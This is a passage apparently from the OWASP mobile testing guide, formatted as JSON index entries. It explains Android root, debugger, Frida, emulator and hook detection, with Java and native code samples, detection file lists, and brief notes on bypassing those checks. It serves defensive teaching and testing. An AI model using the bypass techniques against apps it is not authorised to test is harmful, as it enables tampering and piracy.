with integrity verification requests. This random value, generated by the app or server, helps the verification server confirm that responses match the original requests without third-party tampering.
Limitations: The default daily limit for Google Play Services Integrity Verification API requests is 10,000 requests per day. Applications needing more must contact Google to request an increased limit.
Example Request:
{ \n\u00a0 \u00a0\"requestDetails\": { \n\u00a0 \u00a0 \u00a0\"requestPackageName\": \"com.example.your.package\", \n\u00a0 \u00a0 \u00a0\"timestampMillis\": \"1666025823025\", \n\u00a0 \u00a0 \u00a0\"nonce\": \"kx7QEkGebwQfBalJ4...Xwjhak7o3uHDDQTTqI\" \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"appIntegrity\": { \n\u00a0 \u00a0 \u00a0\"appRecognitionVerdict\": \"UNRECOGNIZED_VERSION\", \n\u00a0 \u00a0 \u00a0\"packageName\": \"com.example.your.package\", \n\u00a0 \u00a0 \u00a0\"certificateSha256Digest\": [ \n\u00a0 \u00a0 \u00a0 \u00a0\"vNsB0...ww1U\" \n\u00a0 \u00a0 \u00a0], \n\u00a0 \u00a0 \u00a0\"versionCode\": \"1\" \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"deviceIntegrity\": { \n\u00a0 \u00a0 \u00a0\"deviceRecognitionVerdict\": [ \n\u00a0 \u00a0 \u00a0 \u00a0\"MEETS_DEVICE_INTEGRITY\" \n\u00a0 \u00a0 \u00a0] \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"accountDetails\": { \n\u00a0 \u00a0 \u00a0\"appLicensingVerdict\": \"UNEVALUATED\" \n\u00a0 \u00a0} \n\u00a0} \n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#programmatic-detection","title":"Programmatic Detection","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#file-existence-checks","title":"File existence checks","text":"Perhaps the most widely used method of programmatic detection is checking for files typically found on rooted devices, such as package files of common rooting apps and their associated files and directories, including the following:
/system/app/Superuser.apk\n/system/etc/init.d/99SuperSUDaemon\n/dev/com.koushikdutta.superuser.daemon/\n/system/xbin/daemonsu\n
Detection code also often looks for binaries that are usually installed once a device has been rooted. These searches include checking for busybox and attempting to open the su binary at different locations:
/sbin/su\n/system/bin/su\n/system/bin/failsafe/su\n/system/xbin/su\n/system/xbin/busybox\n/system/sd/xbin/su\n/data/local/su\n/data/local/xbin/su\n/data/local/bin/su\n
Checking whether su
is on the PATH also works:
public static boolean checkRoot(){\n for(String pathDir : System.getenv(\"PATH\").split(\":\")){\n if(new File(pathDir, \"su\").exists()) {\n return true;\n }\n }\n return false;\n }\n
File checks can be easily implemented in both Java and native code. The following JNI example (adapted from rootinspector) uses the stat
system call to retrieve information about a file and returns \"1\" if the file exists.
jboolean Java_com_example_statfile(JNIEnv * env, jobject this, jstring filepath) {\n jboolean fileExists = 0;\n jboolean isCopy;\n const char * path = (*env)->GetStringUTFChars(env, filepath, &isCopy);\n struct stat fileattrib;\n if (stat(path, &fileattrib) < 0) {\n __android_log_print(ANDROID_LOG_DEBUG, DEBUG_TAG, \"NATIVE: stat error: [%s]\", strerror(errno));\n } else\n {\n __android_log_print(ANDROID_LOG_DEBUG, DEBUG_TAG, \"NATIVE: stat success, access perms: [%d]\", fileattrib.st_mode);\n return 1;\n }\n\n return 0;\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#executing-su-and-other-commands","title":"Executing su
and other commands","text":"Another way of determining whether su
exists is attempting to execute it through the Runtime.getRuntime.exec
method. An IOException will be thrown if su
is not on the PATH. The same method can be used to check for other programs often found on rooted devices, such as busybox and the symbolic links that typically point to it.
SuperSU - by far the most popular rooting tool - runs an authentication daemon named daemonsu
, so the presence of this process is another sign of a rooted device. Running processes can be enumerated with the ActivityManager.getRunningAppProcesses
and manager.getRunningServices
APIs, the ps
command, and browsing through the /proc
directory. The following is an example implemented in rootinspector:
public boolean checkRunningProcesses() {\n\n boolean returnValue = false;\n\n // Get currently running application processes\n List<RunningServiceInfo> list = manager.getRunningServices(300);\n\n if(list != null){\n String tempName;\n for(int i=0;i<list.size();++i){\n tempName = list.get(i).process;\n\n if(tempName.contains(\"supersu\") || tempName.contains(\"superuser\")){\n returnValue = true;\n }\n }\n }\n return returnValue;\n }\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-installed-app-packages","title":"Checking installed app packages","text":"You can use the Android package manager to obtain a list of installed packages. The following package names belong to popular rooting tools:
com.thirdparty.superuser\neu.chainfire.supersu\ncom.noshufou.android.su\ncom.koushikdutta.superuser\ncom.zachspong.temprootremovejb\ncom.ramdroid.appquarantine\ncom.topjohnwu.magisk\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-for-writable-partitions-and-system-directories","title":"Checking for writable partitions and system directories","text":"Unusual permissions on system directories may indicate a customized or rooted device. Although the system and data directories are normally mounted read-only, you'll sometimes find them mounted read-write when the device is rooted. Look for these filesystems mounted with the \"rw\" flag or try to create a file in the data directories.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-for-custom-android-builds","title":"Checking for custom Android builds","text":"Checking for signs of test builds and custom ROMs is also helpful. One way to do this is to check the BUILD tag for test-keys, which normally indicate a custom Android image. Check the BUILD tag as follows:
private boolean isTestKeyBuild()\n{\nString str = Build.TAGS;\nif ((str != null) && (str.contains(\"test-keys\")));\nfor (int i = 1; ; i = 0)\n return i;\n}\n
Missing Google Over-The-Air (OTA) certificates is another sign of a custom ROM: on stock Android builds, OTA updates use Google's public certificates.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging","title":"Anti-Debugging","text":"Debugging is a highly effective way to analyze runtime app behavior. It allows the reverse engineer to step through the code, stop app execution at arbitrary points, inspect the state of variables, read and modify memory, and a lot more.
Anti-debugging features can be preventive or reactive. As the name implies, preventive anti-debugging prevents the debugger from attaching in the first place; reactive anti-debugging involves detecting debuggers and reacting to them in some way (e.g., terminating the app or triggering hidden behavior). The \"more-is-better\" rule applies: to maximize effectiveness, defenders combine multiple methods of prevention and detection that operate on different API layers and are well distributed throughout the app.
As mentioned in the \"Reverse Engineering and Tampering\" chapter, we have to deal with two debugging protocols on Android: we can debug on the Java level with JDWP or on the native layer via a ptrace-based debugger. A good anti-debugging scheme should defend against both types of debugging.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#jdwp-anti-debugging","title":"JDWP Anti-Debugging","text":"In the chapter \"Reverse Engineering and Tampering\", we talked about JDWP, the protocol used for communication between the debugger and the Java Virtual Machine. We showed that it is easy to enable debugging for any app by patching its manifest file, and changing the ro.debuggable
system property which enables debugging for all apps. Let's look at a few things developers do to detect and disable JDWP debuggers.
We have already encountered the android:debuggable
attribute. This flag in the Android Manifest determines whether the JDWP thread is started for the app. Its value can be determined programmatically, via the app's ApplicationInfo
object. If the flag is set, the manifest has been tampered with and allows debugging.
public static boolean isDebuggable(Context context){\n\n return ((context.getApplicationContext().getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE) != 0);\n\n }\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#isdebuggerconnected","title":"isDebuggerConnected","text":"While this might be pretty obvious to circumvent for a reverse engineer, you can use isDebuggerConnected
from the android.os.Debug
class to determine whether a debugger is connected.
public static boolean detectDebugger() {\n return Debug.isDebuggerConnected();\n }\n
The same API can be called via native code by accessing the DvmGlobals global structure.
JNIEXPORT jboolean JNICALL Java_com_test_debugging_DebuggerConnectedJNI(JNIenv * env, jobject obj) {\n if (gDvm.debuggerConnected || gDvm.debuggerActive)\n return JNI_TRUE;\n return JNI_FALSE;\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#timer-checks","title":"Timer Checks","text":"Debug.threadCpuTimeNanos
indicates the amount of time that the current thread has been executing code. Because debugging slows down process execution, you can use the difference in execution time to guess whether a debugger is attached.
static boolean detect_threadCpuTimeNanos(){\n long start = Debug.threadCpuTimeNanos();\n\n for(int i=0; i<1000000; ++i)\n continue;\n\n long stop = Debug.threadCpuTimeNanos();\n\n if(stop - start < 10000000) {\n return false;\n }\n else {\n return true;\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#messing-with-jdwp-related-data-structures","title":"Messing with JDWP-Related Data Structures","text":"In Dalvik, the global virtual machine state is accessible via the DvmGlobals
structure. The global variable gDvm holds a pointer to this structure. DvmGlobals
contains various variables and pointers that are important for JDWP debugging and can be tampered with.
struct DvmGlobals {\n /*\n * Some options that could be worth tampering with :)\n */\n\n bool jdwpAllowed; // debugging allowed for this process?\n bool jdwpConfigured; // has debugging info been provided?\n JdwpTransportType jdwpTransport;\n bool jdwpServer;\n char* jdwpHost;\n int jdwpPort;\n bool jdwpSuspend;\n\n Thread* threadList;\n\n bool nativeDebuggerActive;\n bool debuggerConnected; /* debugger or DDMS is connected */\n bool debuggerActive; /* debugger is making requests */\n JdwpState* jdwpState;\n\n};\n
For example, setting the gDvm.methDalvikDdmcServer_dispatch function pointer to NULL crashes the JDWP thread:
JNIEXPORT jboolean JNICALL Java_poc_c_crashOnInit ( JNIEnv* env , jobject ) {\n gDvm.methDalvikDdmcServer_dispatch = NULL;\n}\n
You can disable debugging by using similar techniques in ART even though the gDvm variable is not available. The ART runtime exports some of the vtables of JDWP-related classes as global symbols (in C++, vtables are tables that hold pointers to class methods). This includes the vtables of the classes JdwpSocketState
and JdwpAdbState
, which handle JDWP connections via network sockets and ADB, respectively. You can manipulate the behavior of the debugging runtime by overwriting the method pointers in the associated vtables (archived).
One way to overwrite the method pointers is to overwrite the address of the function jdwpAdbState::ProcessIncoming
with the address of JdwpAdbState::Shutdown
. This will cause the debugger to disconnect immediately.
#include <jni.h>\n#include <string>\n#include <android/log.h>\n#include <dlfcn.h>\n#include <sys/mman.h>\n#include <jdwp/jdwp.h>\n\n#define log(FMT, ...) __android_log_print(ANDROID_LOG_VERBOSE, \"JDWPFun\", FMT, ##__VA_ARGS__)\n\n// Vtable structure. Just to make messing around with it more intuitive\n\nstruct VT_JdwpAdbState {\n unsigned long x;\n unsigned long y;\n void * JdwpSocketState_destructor;\n void * _JdwpSocketState_destructor;\n void * Accept;\n void * showmanyc;\n void * ShutDown;\n void * ProcessIncoming;\n};\n\nextern \"C\"\n\nJNIEXPORT void JNICALL Java_sg_vantagepoint_jdwptest_MainActivity_JDWPfun(\n JNIEnv *env,\n jobject /* this */) {\n\n void* lib = dlopen(\"libart.so\", RTLD_NOW);\n\n if (lib == NULL) {\n log(\"Error loading libart.so\");\n dlerror();\n }else{\n\n struct VT_JdwpAdbState *vtable = ( struct VT_JdwpAdbState *)dlsym(lib, \"_ZTVN3art4JDWP12JdwpAdbStateE\");\n\n if (vtable == 0) {\n log(\"Couldn't resolve symbol '_ZTVN3art4JDWP12JdwpAdbStateE'.\\n\");\n }else {\n\n log(\"Vtable for JdwpAdbState at: %08x\\n\", vtable);\n\n // Let the fun begin!\n\n unsigned long pagesize = sysconf(_SC_PAGE_SIZE);\n unsigned long page = (unsigned long)vtable & ~(pagesize-1);\n\n mprotect((void *)page, pagesize, PROT_READ | PROT_WRITE);\n\n vtable->ProcessIncoming = vtable->ShutDown;\n\n // Reset permissions & flush cache\n\n mprotect((void *)page, pagesize, PROT_READ);\n\n }\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#traditional-anti-debugging","title":"Traditional Anti-Debugging","text":"On Linux, the ptrace
system call is used to observe and control the execution of a process (the tracee) and to examine and change that process' memory and registers. ptrace
is the primary way to implement system call tracing and breakpoint debugging in native code. Most JDWP anti-debugging tricks (which may be safe for timer-based checks) won't catch classical debuggers based on ptrace
and therefore, many Android anti-debugging tricks include ptrace
, often exploiting the fact that only one debugger at a time can attach to a process.
When you debug an app and set a breakpoint on native code, Android Studio will copy the needed files to the target device and start the lldb-server which will use ptrace
to attach to the process. From this moment on, if you inspect the status file of the debugged process (/proc/<pid>/status
or /proc/self/status
), you will see that the \"TracerPid\" field has a value different from 0, which is a sign of debugging.
Remember that this only applies to native code. If you're debugging a Java/Kotlin-only app, the value of the \"TracerPid\" field should be 0.
This technique is usually applied within the JNI native libraries in C, as shown in Google's gperftools (Google Performance Tools) Heap Checker implementation of the IsDebuggerAttached
method. However, if you prefer to include this check as part of your Java/Kotlin code you can refer to this Java implementation of the hasTracerPid
method from Tim Strazzere's Anti-Emulator project.
When trying to implement such a method yourself, you can manually check the value of TracerPid with ADB. The following listing uses Google's NDK sample app hello-jni (com.example.hellojni) to perform the check after attaching Android Studio's debugger:
$ adb shell ps -A | grep com.example.hellojni\nu0_a271 11657 573 4302108 50600 ptrace_stop 0 t com.example.hellojni\n$ adb shell cat /proc/11657/status | grep -e \"^TracerPid:\" | sed \"s/^TracerPid:\\t//\"\nTracerPid: 11839\n$ adb shell ps -A | grep 11839\nu0_a271 11839 11837 14024 4548 poll_schedule_timeout 0 S lldb-server\n
You can see how the status file of com.example.hellojni (PID=11657) contains a TracerPID of 11839, which we can identify as the lldb-server process.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#using-fork-and-ptrace","title":"Using Fork and ptrace","text":"You can prevent debugging of a process by forking a child process and attaching it to the parent as a debugger via code similar to the following simple example code:
void fork_and_attach()\n{\n int pid = fork();\n\n if (pid == 0)\n {\n int ppid = getppid();\n\n if (ptrace(PTRACE_ATTACH, ppid, NULL, NULL) == 0)\n {\n waitpid(ppid, NULL, 0);\n\n /* Continue the parent process */\n ptrace(PTRACE_CONT, NULL, NULL);\n }\n }\n}\n
With the child attached, further attempts to attach to the parent will fail. We can verify this by compiling the code into a JNI function and packing it into an app we run on the device.
root@android:/ # ps | grep -i anti\nu0_a151 18190 201 1535844 54908 ffffffff b6e0f124 S sg.vantagepoint.antidebug\nu0_a151 18224 18190 1495180 35824 c019a3ac b6e0ee5c S sg.vantagepoint.antidebug\n
Attempting to attach to the parent process with gdbserver fails with an error:
root@android:/ # ./gdbserver --attach localhost:12345 18190\nwarning: process 18190 is already traced by process 18224\nCannot attach to lwp 18190: Operation not permitted (1)\nExiting\n
You can easily bypass this failure, however, by killing the child and \"freeing\" the parent from being traced. You'll therefore usually find more elaborate schemes, involving multiple processes and threads as well as some form of monitoring to impede tampering. Common methods include
/proc
filesystem, such as TracerPID in /proc/pid/status
.Let's look at a simple improvement for the method above. After the initial fork
, we launch in the parent an extra thread that continually monitors the child's status. Depending on whether the app has been built in debug or release mode (which is indicated by the android:debuggable
flag in the manifest), the child process should do one of the following things:
waitpid(child_pid)
should never return. If it does, something is fishy and we would kill the whole process group.The following is the complete code for implementing this improvement with a JNI function:
#include <jni.h>\n#include <unistd.h>\n#include <sys/ptrace.h>\n#include <sys/wait.h>\n#include <pthread.h>\n\nstatic int child_pid;\n\nvoid *monitor_pid() {\n\n int status;\n\n waitpid(child_pid, &status, 0);\n\n /* Child status should never change. */\n\n _exit(0); // Commit seppuku\n\n}\n\nvoid anti_debug() {\n\n child_pid = fork();\n\n if (child_pid == 0)\n {\n int ppid = getppid();\n int status;\n\n if (ptrace(PTRACE_ATTACH, ppid, NULL, NULL) == 0)\n {\n waitpid(ppid, &status, 0);\n\n ptrace(PTRACE_CONT, ppid, NULL, NULL);\n\n while (waitpid(ppid, &status, 0)) {\n\n if (WIFSTOPPED(status)) {\n ptrace(PTRACE_CONT, ppid, NULL, NULL);\n } else {\n // Process has exited\n _exit(0);\n }\n }\n }\n\n } else {\n pthread_t t;\n\n /* Start the monitoring thread */\n pthread_create(&t, NULL, monitor_pid, (void *)NULL);\n }\n}\n\nJNIEXPORT void JNICALL\nJava_sg_vantagepoint_antidebug_MainActivity_antidebug(JNIEnv *env, jobject instance) {\n\n anti_debug();\n}\n
Again, we pack this into an Android app to see if it works. Just as before, two processes show up when we run the app's debug build.
root@android:/ # ps | grep -I anti-debug\nu0_a152 20267 201 1552508 56796 ffffffff b6e0f124 S sg.vantagepoint.anti-debug\nu0_a152 20301 20267 1495192 33980 c019a3ac b6e0ee5c S sg.vantagepoint.anti-debug\n
However, if we terminate the child process at this point, the parent exits as well:
root@android:/ # kill -9 20301\n130|root@hammerhead:/ # cd /data/local/tmp\nroot@android:/ # ./gdbserver --attach localhost:12345 20267\ngdbserver: unable to open /proc file '/proc/20267/status'\nCannot attach to lwp 20267: No such file or directory (2)\nExiting\n
To bypass this, we must modify the app's behavior slightly (the easiest ways to do so are patching the call to _exit
with NOPs and hooking the function _exit
in libc.so
). At this point, we have entered the proverbial \"arms race\": implementing more intricate forms of this defense as well as bypassing it are always possible.
There are two topics related to file integrity:
SharedPreferences
should be protected.Integrity checks often calculate a checksum or hash over selected files. Commonly protected files include
The following sample implementation from the Android Cracking blog calculates a CRC over classes.dex
and compares it to the expected value.
private void crcTest() throws IOException {\n boolean modified = false;\n // required dex crc value stored as a text string.\n // it could be any invisible layout element\n long dexCrc = Long.parseLong(Main.MyContext.getString(R.string.dex_crc));\n\n ZipFile zf = new ZipFile(Main.MyContext.getPackageCodePath());\n ZipEntry ze = zf.getEntry(\"classes.dex\");\n\n if ( ze.getCrc() != dexCrc ) {\n // dex has been modified\n modified = true;\n }\n else {\n // dex not tampered with\n modified = false;\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#sample-implementation-storage","title":"Sample Implementation - Storage","text":"When providing integrity on the storage itself, you can either create an HMAC over a given key-value pair (as for the Android SharedPreferences
) or create an HMAC over a complete file that's provided by the file system.
When using an HMAC, you can use a bouncy castle implementation or the AndroidKeyStore to HMAC the given content.
Complete the following procedure when generating an HMAC with BouncyCastle:
doFinal
on the HMAC with the bytecode.Complete the following procedure when verifying the HMAC with BouncyCastle:
When generating the HMAC based on the Android Keystore, it is best to do this only for Android 6.0 (API level 23) and higher.
The following is a convenient HMAC implementation without AndroidKeyStore
:
public enum HMACWrapper {\n HMAC_512(\"HMac-SHA512\"), //please note that this is the spec for the BC provider\n HMAC_256(\"HMac-SHA256\");\n\n private final String algorithm;\n\n private HMACWrapper(final String algorithm) {\n this.algorithm = algorithm;\n }\n\n public Mac createHMAC(final SecretKey key) {\n try {\n Mac e = Mac.getInstance(this.algorithm, \"BC\");\n SecretKeySpec secret = new SecretKeySpec(key.getKey().getEncoded(), this.algorithm);\n e.init(secret);\n return e;\n } catch (NoSuchProviderException | InvalidKeyException | NoSuchAlgorithmException e) {\n //handle them\n }\n }\n\n public byte[] hmac(byte[] message, SecretKey key) {\n Mac mac = this.createHMAC(key);\n return mac.doFinal(message);\n }\n\n public boolean verify(byte[] messageWithHMAC, SecretKey key) {\n Mac mac = this.createHMAC(key);\n byte[] checksum = extractChecksum(messageWithHMAC, mac.getMacLength());\n byte[] message = extractMessage(messageWithHMAC, mac.getMacLength());\n byte[] calculatedChecksum = this.hmac(message, key);\n int diff = checksum.length ^ calculatedChecksum.length;\n\n for (int i = 0; i < checksum.length && i < calculatedChecksum.length; ++i) {\n diff |= checksum[i] ^ calculatedChecksum[i];\n }\n\n return diff == 0;\n }\n\n public byte[] extractMessage(byte[] messageWithHMAC) {\n Mac hmac = this.createHMAC(SecretKey.newKey());\n return extractMessage(messageWithHMAC, hmac.getMacLength());\n }\n\n private static byte[] extractMessage(byte[] body, int checksumLength) {\n if (body.length >= checksumLength) {\n byte[] message = new byte[body.length - checksumLength];\n System.arraycopy(body, 0, message, 0, message.length);\n return message;\n } else {\n return new byte[0];\n }\n }\n\n private static byte[] extractChecksum(byte[] body, int checksumLength) {\n if (body.length >= checksumLength) {\n byte[] checksum = new byte[checksumLength];\n System.arraycopy(body, body.length - checksumLength, checksum, 0, checksumLength);\n return checksum;\n } else {\n return new 
byte[0];\n }\n }\n\n static {\n Security.addProvider(new BouncyCastleProvider());\n }\n}\n
Another way to provide integrity is to sign the byte array you obtained and add the signature to the original byte array.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detection-of-reverse-engineering-tools","title":"Detection of Reverse Engineering Tools","text":"The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a rooted device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different methods that an app can implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide. Other tools, such as Substrate and Xposed, can be detected similarly. Note that DBI/injection/hooking tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
For instance, in its default configuration on a rooted device, Frida runs on the device as frida-server. When you explicitly attach to a target app (e.g. via frida-trace or the Frida REPL), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). If you check /proc/<pid>/maps
you'll find the frida-agent as frida-agent-64.so:
bullhead:/ # cat /proc/18370/maps | grep -i frida\n71b6bd6000-71b7d62000 r-xp /data/local/tmp/re.frida.server/frida-agent-64.so\n71b7d7f000-71b7e06000 r--p /data/local/tmp/re.frida.server/frida-agent-64.so\n71b7e06000-71b7e28000 rw-p /data/local/tmp/re.frida.server/frida-agent-64.so\n
The other method (which also works for non-rooted devices) consists of embedding a frida-gadget into the APK and forcing the app to load it as one of its native libraries. If you inspect the app memory maps after starting the app (no need to attach explicitly to it) you'll find the embedded frida-gadget as libfrida-gadget.so.
bullhead:/ # cat /proc/18370/maps | grep -i frida\n\n71b865a000-71b97f1000 r-xp /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n71b9802000-71b988a000 r--p /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n71b988a000-71b98ac000 rw-p /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n
Looking at these two traces that Frida leaves behind, you might already imagine that detecting them would be a trivial task. And in fact, bypassing that detection would be just as trivial. But things can get much more complicated. The following table briefly presents a set of typical Frida detection methods and a short discussion of their effectiveness.
Some of the following detection methods are presented in the article \"The Jiu-Jitsu of Detecting Frida\" by Bernhard Mueller (archived). Please refer to it for more details and for example code snippets.
Method Description Discussion Checking the App Signature In order to embed the frida-gadget within the APK, it would need to be repackaged and resigned. You could check the signature of the APK when the app is starting (e.g. GET_SIGNING_CERTIFICATES since API level 28) and compare it to the one you pinned in your APK. This is unfortunately too trivial to bypass, e.g. by patching the APK or performing system call hooking. Check The Environment For Related Artifacts Artifacts can be package files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (rooted) system (the daemon responsible for exposing Frida over TCP). Inspect the running services (getRunningServices
) and processes (ps
) searching for one whose name is \"frida-server\". You could also walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names). Since Android 7.0 (API level 24), inspecting the running services/processes won't show you daemons like the frida-server as it is not being started by the app itself. Even if it would be possible, bypassing this would be as easy just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Check whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is a little too trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Scanning Process Memory for Known Artifacts Scan the memory for artifacts found in Frida's libraries, e.g. the string \"LIBFRIDA\" present in all versions of frida-gadget and frida-agent. For example, use Runtime.getRuntime().exec
and iterate through the memory mappings listed in /proc/self/maps
or /proc/<pid>/maps
(depending on the Android version) searching for the string. This method is a bit more effective, and it is difficult to bypass with Frida only, especially if some obfuscation has been added and if multiple artifacts are being scanned. However, the chosen artifacts might be patched in the Frida binaries. Find the source code on Berdhard Mueller's GitHub. Please remember that this table is far from exhaustive. We could start talking about named pipes (used by frida-server for external communication), detecting trampolines (indirect jump vectors inserted at the prologue of functions), which would help detecting Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker; and many other, more or less, effective detection methods. Each of them will depend on whether you're using a rooted device, the specific version of the rooting method and/or the version of the tool itself. Further, the app can try to make it harder to detect the implemented protection mechanisms by using various obfuscation techniques. At the end, this is part of the cat and mouse game of protecting data being processed on an untrusted environment (an app running in the user device).
It is important to note that these controls are only increasing the complexity of the reverse engineering process. If used, the best approach is to combine the controls cleverly instead of using them individually. However, none of them can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win! You also have to consider that integrating some of the controls into your app might increase the complexity of your app and even have an impact on its performance.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"In the context of anti-reversing, the goal of emulator detection is to increase the difficulty of running the app on an emulated device, which impedes some tools and techniques reverse engineers like to use. This increased difficulty forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
There are several indicators that the device in question is being emulated. Although all these API calls can be hooked, these indicators provide a modest first line of defense.
The first set of indicators are in the file build.prop
.
API Method Value Meaning\nBuild.ABI armeabi possibly emulator\nBUILD.ABI2 unknown possibly emulator\nBuild.BOARD unknown emulator\nBuild.Brand generic emulator\nBuild.DEVICE generic emulator\nBuild.FINGERPRINT generic emulator\nBuild.Hardware goldfish emulator\nBuild.Host android-test possibly emulator\nBuild.ID FRF91 emulator\nBuild.MANUFACTURER unknown emulator\nBuild.MODEL sdk emulator\nBuild.PRODUCT sdk emulator\nBuild.RADIO unknown possibly emulator\nBuild.SERIAL null emulator\nBuild.USER android-build emulator\n
You can edit the file build.prop
on a rooted Android device or modify it while compiling AOSP from source. Both techniques will allow you to bypass the static string checks above.
The next set of static indicators utilize the Telephony manager. All Android emulators have fixed values that this API can query.
API Value Meaning\nTelephonyManager.getDeviceId() 0's emulator\nTelephonyManager.getLine1 Number() 155552155 emulator\nTelephonyManager.getNetworkCountryIso() us possibly emulator\nTelephonyManager.getNetworkType() 3 possibly emulator\nTelephonyManager.getNetworkOperator().substring(0,3) 310 possibly emulator\nTelephonyManager.getNetworkOperator().substring(3) 260 possibly emulator\nTelephonyManager.getPhoneType() 1 possibly emulator\nTelephonyManager.getSimCountryIso() us possibly emulator\nTelephonyManager.getSimSerial Number() 89014103211118510720 emulator\nTelephonyManager.getSubscriberId() 310260000000000 emulator\nTelephonyManager.getVoiceMailNumber() 15552175049 emulator\n
Keep in mind that a hooking framework, such as Xposed or Frida, can hook this API to provide false data.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#runtime-integrity-verification","title":"Runtime Integrity Verification","text":"Controls in this category verify the integrity of the app's memory space to defend the app against memory patches applied during runtime. Such patches include unwanted changes to binary code, bytecode, function pointer tables, and important data structures, as well as rogue code loaded into process memory. Integrity can be verified by:
There's some overlap with the category \"detecting reverse engineering tools and frameworks\", and, in fact, we demonstrated the signature-based approach in that chapter when we showed how to search process memory for Frida-related strings. Below are a few more examples of various kinds of integrity monitoring.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detecting-tampering-with-the-java-runtime","title":"Detecting Tampering with the Java Runtime","text":"This detection code is from the dead && end blog.
try {\n throw new Exception();\n}\ncatch(Exception e) {\n int zygoteInitCallCount = 0;\n for(StackTraceElement stackTraceElement : e.getStackTrace()) {\n if(stackTraceElement.getClassName().equals(\"com.android.internal.os.ZygoteInit\")) {\n zygoteInitCallCount++;\n if(zygoteInitCallCount == 2) {\n Log.wtf(\"HookDetection\", \"Substrate is active on the device.\");\n }\n }\n if(stackTraceElement.getClassName().equals(\"com.saurik.substrate.MS$2\") &&\n stackTraceElement.getMethodName().equals(\"invoked\")) {\n Log.wtf(\"HookDetection\", \"A method on the stack trace has been hooked using Substrate.\");\n }\n if(stackTraceElement.getClassName().equals(\"de.robv.android.xposed.XposedBridge\") &&\n stackTraceElement.getMethodName().equals(\"main\")) {\n Log.wtf(\"HookDetection\", \"Xposed is active on the device.\");\n }\n if(stackTraceElement.getClassName().equals(\"de.robv.android.xposed.XposedBridge\") &&\n stackTraceElement.getMethodName().equals(\"handleHookedMethod\")) {\n Log.wtf(\"HookDetection\", \"A method on the stack trace has been hooked using Xposed.\");\n }\n\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detecting-native-hooks","title":"Detecting Native Hooks","text":"By using ELF binaries, native function hooks can be installed by overwriting function pointers in memory (e.g., Global Offset Table or PLT hooking) or patching parts of the function code itself (inline hooking). Checking the integrity of the respective memory regions is one way to detect this kind of hook.
The Global Offset Table (GOT) is used to resolve library functions. During runtime, the dynamic linker patches this table with the absolute addresses of global symbols. GOT hooks overwrite the stored function addresses and redirect legitimate function calls to adversary-controlled code. This type of hook can be detected by enumerating the process memory map and verifying that each GOT entry points to a legitimately loaded library.
In contrast to GNU ld
, which resolves symbol addresses only after they are needed for the first time (lazy binding), the Android linker resolves all external functions and writes the respective GOT entries immediately after a library is loaded (immediate binding). You can therefore expect all GOT entries to point to valid memory locations in the code sections of their respective libraries during runtime. GOT hook detection methods usually walk the GOT and verify this.
Inline hooks work by overwriting a few instructions at the beginning or end of the function code. During runtime, this so-called trampoline redirects execution to the injected code. You can detect inline hooks by inspecting the prologues and epilogues of library functions for suspect instructions, such as far jumps to locations outside the library.
